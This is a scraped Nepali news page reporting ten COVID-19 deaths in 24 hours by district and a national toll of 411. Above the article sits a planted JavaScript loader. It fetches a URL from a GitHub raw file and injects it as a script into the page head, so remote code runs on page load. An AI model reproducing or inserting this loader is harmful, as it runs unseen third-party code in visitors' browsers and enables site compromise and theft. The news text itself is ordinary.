;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज ०४
काठमाडौं । पछिल्लो २४ घण्टामा १० जनाको कोरोना संक्रमणबाट मृत्यु भएको छ । स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार ६ जना महिला ४ जना पुरुषको मृत्यु भएको हो ।
काठमाडौंमा ३ महिला र १ पुरुषसहित, भत्तपुर र ललितपुरमा १/१ जना महिला छन् । त्यसैगरी पाल्पामा २ जना महिला, धनुषा, चितवन र रुपन्देहीमा १/१ जना पुरुषको कोरोना संक्रमणबाट मृत्यु भएको छ ।
योसँगै नेपालमा कोरोनाबाट मृत्यु हुनेको संख्या ४११ पुगेको छ ।
फेसबुक प्रतिक्रियाहरु